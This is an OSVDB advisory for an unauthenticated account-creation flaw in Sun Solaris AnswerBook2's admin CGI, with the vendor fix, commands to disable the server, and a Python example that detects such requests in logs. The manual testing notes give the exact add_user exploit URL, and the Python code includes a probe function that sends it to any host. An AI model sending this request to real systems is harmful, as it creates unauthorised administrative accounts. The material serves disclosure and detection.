Sun AnswerBook2 dwhttpd Arbitrary Account Creation

2000-08-08T00:00:00
ID OSVDB:8679
Type osvdb
Reporter Lluis Mora(llmora@s21sec.com)
Modified 2000-08-08T00:00:00

Description

Vulnerability Description

Sun Microsystems Solaris AnswerBook2 contains a flaw that may allow a malicious user to create an arbitrary account. The administrative CGI script at /cgi-bin/admin/admin accepts an add_user command without requiring authentication, so a malicious user who can reach the documentation server over the network can request the script directly and pass it the parameters needed to create a new user account. That account can then be used to access the administrative functions of AnswerBook2, resulting in a loss of integrity.

Solution Description

Upgrade to version 1.4.2 with the vendor patch applied, or to a later version, as this has been reported to fix the vulnerability. Until the upgrade is applied, the flaw can be mitigated by disabling the AnswerBook2 Documentation Server; run the following commands as the root user (the first stops the server, the second keeps it from being started automatically):

/usr/lib/ab2/bin/ab2admin -o stop

/usr/lib/ab2/bin/ab2admin -o autostart_no

Manual Testing Notes

Requesting the following URL without any credentials creates the account "percebe" with password "percebe"; the new account can then be used to reach the administrative functions:

http://[victim]:8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe
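The following is an added example, not part of the OSVDB record or of Sun's code. It builds the add_user probe from the Manual Testing Notes for any host, optionally sends it, and scans web-server access-log lines for the same request so that attempts can be spotted after the fact. The log format (Common Log Format) and the sample log lines are constructed for illustration; dwhttpd's real log layout, the /ab2/ path and the list_users command in the sample are assumptions.

```python
"""Probe builder and log detector for the AnswerBook2 unauthenticated add_user
request (added example; log format and sample lines are constructed)."""
import re
import urllib.error
import urllib.parse
import urllib.request

ADMIN_CGI = "/cgi-bin/admin/admin"
DEFAULT_PORT = 8888  # AnswerBook2 documentation server port used in the testing notes


def build_add_user_url(host, uid, password, port=DEFAULT_PORT):
    """Return the GET URL that creates an account via the unauthenticated admin CGI.
    Parameter values are URL-encoded; the password is repeated in re_password,
    as the manual test shows the script expects."""
    query = urllib.parse.urlencode({
        "command": "add_user",
        "uid": uid,
        "password": password,
        "re_password": password,
    })
    return f"http://{host}:{port}{ADMIN_CGI}?{query}"


def probe(host, uid, password, port=DEFAULT_PORT, timeout=10):
    """Send the probe (network I/O; only against hosts you are authorised to test).
    Returns the HTTP status code, or None if the server could not be reached.
    A 200 alone does not prove the account was created: log in with uid/password
    and check that the admin functions are reachable."""
    url = build_add_user_url(host, uid, password, port)
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as exc:
        return exc.code
    except (urllib.error.URLError, OSError):
        return None


# Common Log Format (assumed for the example): ip ident user [ts] "METHOD target PROTO" status size
_CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def find_add_user_requests(log_lines):
    """Return (ip, timestamp, uid, status) for every request to the admin CGI
    carrying command=add_user. The query string is parsed rather than matched
    as a literal so that reordered parameters are still caught."""
    hits = []
    for line in log_lines:
        m = _CLF.match(line)
        if not m:
            continue
        parsed = urllib.parse.urlsplit(m.group("target"))
        if parsed.path.lower() != ADMIN_CGI:
            continue
        params = urllib.parse.parse_qs(parsed.query)
        if "add_user" not in params.get("command", []):
            continue
        uid = params.get("uid", ["<none>"])[0]
        hits.append((m.group("ip"), m.group("ts"), uid, int(m.group("status"))))
    return hits


# Constructed sample log lines (RFC 5737 test addresses); not real dwhttpd output.
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Aug/2000:10:15:22 -0700] "GET /ab2/ HTTP/1.0" 200 5120',
    '198.51.100.7 - - [08/Aug/2000:10:16:01 -0700] "GET /cgi-bin/admin/admin'
    '?command=add_user&uid=percebe&password=percebe&re_password=percebe HTTP/1.0" 200 1432',
    '198.51.100.7 - - [08/Aug/2000:10:16:30 -0700] "GET /cgi-bin/admin/admin'
    '?uid=eve&password=x&re_password=x&command=add_user HTTP/1.0" 200 1432',
    '203.0.113.5 - - [08/Aug/2000:10:17:05 -0700] "GET /cgi-bin/admin/admin'
    '?command=list_users HTTP/1.0" 403 210',
]

if __name__ == "__main__":
    print(build_add_user_url("victim", "percebe", "percebe"))
    for ip, ts, uid, status in find_add_user_requests(SAMPLE_LOG):
        print(f"{ts} add_user from {ip}: uid={uid} status={status}")
```

Run the detector over the server's access log to see whether the flaw was used before the patch or workaround went in; each hit names the account that was requested, which is what you then remove from AnswerBook2.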

References:

Vendor Specific Advisory URL
Vendor Specific Advisory URL
Related OSVDB ID: 8680
ISS X-Force ID: 5069
CVE-2000-0696
CIAC Advisory: l-031
CIAC Advisory: o-012
Bugtraq ID: 1554